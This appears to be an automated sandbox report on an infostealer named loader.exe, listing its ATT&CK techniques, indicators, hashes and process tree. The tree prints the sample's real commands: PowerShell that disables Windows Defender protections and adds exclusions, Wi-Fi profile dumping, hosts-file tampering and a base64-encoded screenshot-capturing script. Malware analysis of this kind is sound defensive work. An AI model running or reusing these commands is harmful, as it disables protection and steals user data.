0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903

Analysis

max time kernel
21s
max time network
22s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05/09/2024, 11:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

loader.exe
Size

14.4MB
MD5

0b36da64b85e5abae7a93017d46dcce1
SHA1

40506f88be2a8f9fc03083f8d934b58fe22c3ae5
SHA256

0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903
SHA512

a0a8fbb2127451ae7c776fff5e2d26d1d8e035527010f7f91a2904a76edfcaa054bf5becddc29fbe98e49bd211f8ae1f94c884e8e92c9b62984313cf843d9572
SSDEEP

196608:tzElGkSaXkbEzeMeHJJ4u/RVyjwnx4YpXNzP0nreN:5ElGbFbEzVO4u/Rg9YTzF

Score

9^/10

credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4440	powershell.exe
32	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	loader.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\WindowsSecurity.exe"	loader.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	discord.com
10	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2172	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2492	wmic.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	5	Go-http-client/1.1
HTTP User-Agent header	13	Go-http-client/1.1

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
4440	powershell.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
4440	powershell.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe
1564	loader.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1564	loader.exe
Token: SeIncreaseQuotaPrivilege	4532	wmic.exe
Token: SeSecurityPrivilege	4532	wmic.exe
Token: SeTakeOwnershipPrivilege	4532	wmic.exe
Token: SeLoadDriverPrivilege	4532	wmic.exe
Token: SeSystemProfilePrivilege	4532	wmic.exe
Token: SeSystemtimePrivilege	4532	wmic.exe
Token: SeProfSingleProcessPrivilege	4532	wmic.exe
Token: SeIncBasePriorityPrivilege	4532	wmic.exe
Token: SeCreatePagefilePrivilege	4532	wmic.exe
Token: SeBackupPrivilege	4532	wmic.exe
Token: SeRestorePrivilege	4532	wmic.exe
Token: SeShutdownPrivilege	4532	wmic.exe
Token: SeDebugPrivilege	4532	wmic.exe
Token: SeSystemEnvironmentPrivilege	4532	wmic.exe
Token: SeRemoteShutdownPrivilege	4532	wmic.exe
Token: SeUndockPrivilege	4532	wmic.exe
Token: SeManageVolumePrivilege	4532	wmic.exe
Token: 33	4532	wmic.exe
Token: 34	4532	wmic.exe
Token: 35	4532	wmic.exe
Token: 36	4532	wmic.exe
Token: SeIncreaseQuotaPrivilege	4532	wmic.exe
Token: SeSecurityPrivilege	4532	wmic.exe
Token: SeTakeOwnershipPrivilege	4532	wmic.exe
Token: SeLoadDriverPrivilege	4532	wmic.exe
Token: SeSystemProfilePrivilege	4532	wmic.exe
Token: SeSystemtimePrivilege	4532	wmic.exe
Token: SeProfSingleProcessPrivilege	4532	wmic.exe
Token: SeIncBasePriorityPrivilege	4532	wmic.exe
Token: SeCreatePagefilePrivilege	4532	wmic.exe
Token: SeBackupPrivilege	4532	wmic.exe
Token: SeRestorePrivilege	4532	wmic.exe
Token: SeShutdownPrivilege	4532	wmic.exe
Token: SeDebugPrivilege	4532	wmic.exe
Token: SeSystemEnvironmentPrivilege	4532	wmic.exe
Token: SeRemoteShutdownPrivilege	4532	wmic.exe
Token: SeUndockPrivilege	4532	wmic.exe
Token: SeManageVolumePrivilege	4532	wmic.exe
Token: 33	4532	wmic.exe
Token: 34	4532	wmic.exe
Token: 35	4532	wmic.exe
Token: 36	4532	wmic.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeIncreaseQuotaPrivilege	4180	wmic.exe
Token: SeSecurityPrivilege	4180	wmic.exe
Token: SeTakeOwnershipPrivilege	4180	wmic.exe
Token: SeLoadDriverPrivilege	4180	wmic.exe
Token: SeSystemProfilePrivilege	4180	wmic.exe
Token: SeSystemtimePrivilege	4180	wmic.exe
Token: SeProfSingleProcessPrivilege	4180	wmic.exe
Token: SeIncBasePriorityPrivilege	4180	wmic.exe
Token: SeCreatePagefilePrivilege	4180	wmic.exe
Token: SeBackupPrivilege	4180	wmic.exe
Token: SeRestorePrivilege	4180	wmic.exe
Token: SeShutdownPrivilege	4180	wmic.exe
Token: SeDebugPrivilege	4180	wmic.exe
Token: SeSystemEnvironmentPrivilege	4180	wmic.exe
Token: SeRemoteShutdownPrivilege	4180	wmic.exe
Token: SeUndockPrivilege	4180	wmic.exe
Token: SeManageVolumePrivilege	4180	wmic.exe
Token: 33	4180	wmic.exe
Token: 34	4180	wmic.exe
Token: 35	4180	wmic.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1564 wrote to memory of 1036	1564	loader.exe	89
PID 1564 wrote to memory of 1036	1564	loader.exe	89
PID 1564 wrote to memory of 4532	1564	loader.exe	90
PID 1564 wrote to memory of 4532	1564	loader.exe	90
PID 1564 wrote to memory of 4440	1564	loader.exe	91
PID 1564 wrote to memory of 4440	1564	loader.exe	91
PID 1564 wrote to memory of 4180	1564	loader.exe	93
PID 1564 wrote to memory of 4180	1564	loader.exe	93
PID 1564 wrote to memory of 2964	1564	loader.exe	94
PID 1564 wrote to memory of 2964	1564	loader.exe	94
PID 1564 wrote to memory of 2492	1564	loader.exe	95
PID 1564 wrote to memory of 2492	1564	loader.exe	95
PID 1564 wrote to memory of 32	1564	loader.exe	96
PID 1564 wrote to memory of 32	1564	loader.exe	96
PID 1564 wrote to memory of 1808	1564	loader.exe	97
PID 1564 wrote to memory of 1808	1564	loader.exe	97
PID 1564 wrote to memory of 2172	1564	loader.exe	98
PID 1564 wrote to memory of 2172	1564	loader.exe	98
PID 1564 wrote to memory of 4916	1564	loader.exe	99
PID 1564 wrote to memory of 4916	1564	loader.exe	99
PID 1564 wrote to memory of 2896	1564	loader.exe	100
PID 1564 wrote to memory of 2896	1564	loader.exe	100
PID 1564 wrote to memory of 4216	1564	loader.exe	101
PID 1564 wrote to memory of 4216	1564	loader.exe	101
PID 4216 wrote to memory of 3920	4216	powershell.exe	102
PID 4216 wrote to memory of 3920	4216	powershell.exe	102
PID 3920 wrote to memory of 2700	3920	csc.exe	103
PID 3920 wrote to memory of 2700	3920	csc.exe	103

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1036	attrib.exe
2964	attrib.exe
4916	attrib.exe
2896	attrib.exe

C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1564
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\loader.exe
  2⤵
  - Views/modifies file attributes
  PID:1036
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\loader.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4440
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4180
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\WindowsSecurity.exe
  2⤵
  - Views/modifies file attributes
  PID:2964
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:32
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:1808
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:2172
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:4916
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:2896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4216
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dpjhl1td\dpjhl1td.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3920
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBFF4.tmp" "c:\Users\Admin\AppData\Local\Temp\dpjhl1td\CSC15A86433B304771BE34FD3F58FF9C45.TMP"
      4⤵
      PID:2700

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
98baf5117c4fcec1692067d200c58ab3

SHA1
5b33a57b72141e7508b615e17fb621612cb8e390

SHA256
30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

SHA512
344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBFF4.tmp

Filesize
1KB

MD5
8f21d1e9bed42b5946f0caea2474dc92

SHA1
41097693de885959fb2d8cf37d500fd739886ac0

SHA256
f63f1a077a988ebc3600854a563adf14e943b2eb6febccf0ecc50c775f3d853c

SHA512
1a71ff36ccfefdcf57f06216288a928964f4f08da7c9464b93a97904dd86f1b831f9bd9c728d8202fe70881952aa49c83de5044e5a131efadcdf8d82dfc25ac6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hfnbzsqn.nqr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dpjhl1td\dpjhl1td.dll

Filesize
4KB

MD5
e7445b68cdeff9371d11278a60149cc6

SHA1
4fdb1ae138fb4d6197a0e6e4c08c902d88b06717

SHA256
ec2ce2072420620716bea675d1be1beef73b57641f11716d0784e24aafcbbd25

SHA512
12770d1ace131adae0f9986fa9df0d16c66ef62758233f67409b099a438563d8c117c8186b083a565b1227bba2bba26f8619c92ab39ef49a6aef1cc7b86675df

Download Submit
C:\Users\Admin\AppData\Local\Temp\xjwYCNXFgP\Display (1).png

Filesize
425KB

MD5
71d29a5ed0665818357edbf26c1141ff

SHA1
492cb489bbaa3aece11f70b7eb23e3937f786660

SHA256
5a19332fd7e32f3254acbdf6f9392f5bea0841d42fcaaa13c0f35efb4a4e0183

SHA512
fe80904309bdd2bb2e2614f0cced3eec5c47dd0b2c3b6b35b85631231bb10f78df97680594ab786c89aeffd4f891665d002ff462f7eab071ea6681b70c4abccd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\WindowsSecurity.exe

Filesize
14.4MB

MD5
0b36da64b85e5abae7a93017d46dcce1

SHA1
40506f88be2a8f9fc03083f8d934b58fe22c3ae5

SHA256
0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903

SHA512
a0a8fbb2127451ae7c776fff5e2d26d1d8e035527010f7f91a2904a76edfcaa054bf5becddc29fbe98e49bd211f8ae1f94c884e8e92c9b62984313cf843d9572

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dpjhl1td\CSC15A86433B304771BE34FD3F58FF9C45.TMP

Filesize
652B

MD5
87fd176c029c10ea7709cae925ea16a2

SHA1
2e5885419f2237f4a5b908f56c989b1d3f77d421

SHA256
ea469fbcf3be9dda46ed290c6b1ac2465ee6b9f15c704a3460812a6807ed63d6

SHA512
7ce50a4fb1659d0a9b166cd60ca8c9931c2bd68492c7348e846d0839132d4cc2b8474999669bf505bf1eb6b29cd095c692b67ccbb405a4d4b04a0360ef6d363b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dpjhl1td\dpjhl1td.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dpjhl1td\dpjhl1td.cmdline

Filesize
607B

MD5
9c902a1882f25c186e08651049dad214

SHA1
3f1fad83aa413e7bd390e94726be56353890e6b0

SHA256
2c21c13b19880638fb16827147598413d3cba52d8fd4f8f173cbcaea5684943d

SHA512
e923020376b3afe971411ffbd515870535ebb25a4f26a70b0d0aaf4cabfff8559162cd89d5766be7e705fa84a03d11cb362c434e947e467c874c7983f82e3ea6

Download Submit
memory/4216-60-0x000001C4F5530000-0x000001C4F5538000-memory.dmp

Filesize
32KB

Download
memory/4440-0-0x00007FFB17773000-0x00007FFB17775000-memory.dmp

Filesize
8KB

Download
memory/4440-19-0x00007FFB17770000-0x00007FFB18231000-memory.dmp

Filesize
10.8MB

Download
memory/4440-11-0x00007FFB17770000-0x00007FFB18231000-memory.dmp

Filesize
10.8MB

Download
memory/4440-12-0x00007FFB17770000-0x00007FFB18231000-memory.dmp

Filesize
10.8MB

Download
memory/4440-10-0x000001EAEAA60000-0x000001EAEAA82000-memory.dmp

Filesize
136KB

Download